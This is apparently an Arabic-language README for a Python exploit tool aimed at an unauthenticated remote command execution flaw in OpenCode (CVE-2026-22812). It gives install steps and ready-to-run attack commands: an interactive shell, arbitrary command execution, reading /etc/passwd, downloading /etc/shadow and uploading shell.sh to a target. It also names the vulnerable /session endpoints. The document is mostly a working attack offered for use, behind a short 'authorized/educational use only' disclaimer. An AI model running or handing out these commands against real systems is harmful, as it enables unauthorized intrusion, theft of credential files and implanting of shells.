
أداة استغلال بلغة Python لثغرة تنفيذ الأوامر عن بُعد في OpenCode (CVE-2026-22812) توفر تنفيذ الأوامر، وقراءة/كتابة/رفع/تنزيل الملفات، وقشرة تفاعلية لاختبار الاختراق المصرح به.
أداة استغلال بلغة Python لثغرة تنفيذ الأوامر عن بُعد (RCE) في OpenCode والتي تؤثر على الإصدارات الأقدم من v1.0.216. توفر هذه الأداة نواقل هجوم متعددة تشمل تنفيذ الأوامر، قراءة/كتابة الملفات، رفع/تنزيل الملفات، وقشرة تفاعلية.
⚠️ للاستخدام المصرح به فقط ⚠️
# استنساخ المستودع
git clone https://github.com/0xgh057r3c0n/CVE-2026-22812.git
cd CVE-2026-22812
# تثبيت التبعيات
pip install requests urllib3
# جعل الملف قابلًا للتنفيذ (اختياري)
chmod +x CVE-2026-22812.py
requestsurllib3python3 CVE-2026-22812.py -t http://target:port [options]
# التحقق مما إذا كان الهدف معرضًا للثغرة
python3 exploit.py -t http://10.0.0.1:4096 --check
# قشرة تفاعلية
python3 exploit.py -t http://10.0.0.1:4096 -i
# تنفيذ أمر واحد
python3 exploit.py -t http://10.0.0.1:4096 -c "id"
# قراءة ملف
python3 exploit.py -t http://10.0.0.1:4096 -r /etc/passwd
# رفع ملف
python3 exploit.py -t http://10.0.0.1:4096 --upload shell.sh /tmp/shell.sh
# تنزيل ملف
python3 exploit.py -t http://10.0.0.1:4096 --download /etc/shadow shadow.txt
# الحصول على معلومات النظام
python3 exploit.py -t http://10.0.0.1:4096 --info
# استخدام بروكسي (Burp Suite، إلخ.)
python3 exploit.py -t http://10.0.0.1:4096 -c "whoami" --proxy http://127.0.0.1:8080
بمجرد الدخول إلى القشرة التفاعلية (علامة -i)، يمكنك استخدام:
<command> تنفيذ أمر قشرة
help عرض قائمة المساعدة
exit الخروج من القشرة
session عرض معرف الجلسة
stats عرض إحصائيات الاستغلال
read <file> قراءة محتوى ملف
download <remote> <local> تنزيل ملف
upload <local> <remote> رفع ملف
sysinfo الحصول على معلومات النظام
توجد الثغرة في نقطة نهاية إدارة الجلسات (/session) والتي تسمح للمستخدمين غير المصادق عليهم بإنشاء جلسات وتنفيذ أوامر عشوائية من خلال نقطة نهاية /session/{id}/shell.
POST /session - إنشاء جلسةPOST /session/{id}/shell - تنفيذ الأوامرGET /file/content - قراءة الملفاتCVE-2026-22812.py
├── Colors class (رموز ألوان ANSI)
├── print_banner() (عرض الشعار)
├── Exploit class (منطق الاستغلال الرئيسي)
│ ├── __init__() (التهيئة)
│ ├── check_vuln() (فحص الثغرة)
│ ├── create_session() (إنشاء جلسة)
│ ├── exec_cmd() (تنفيذ أمر)
│ ├── read_file() (قراءة ملف)
│ ├── write_file() (كتابة ملف)
│ ├── upload() (رفع ملف)
│ ├── download() (تنزيل ملف)
│ ├── get_info() (معلومات النظام)
│ ├── shell() (قشرة تفاعلية)
│ └── Helper methods (طرق مساعدة)
└── main() (تحليل الوسائط)
تم إصدار هذه الأداة لأغراض تعليمية فقط. استخدمها على مسؤوليتك الخاصة.
للمشكلات والأسئلة، يرجى: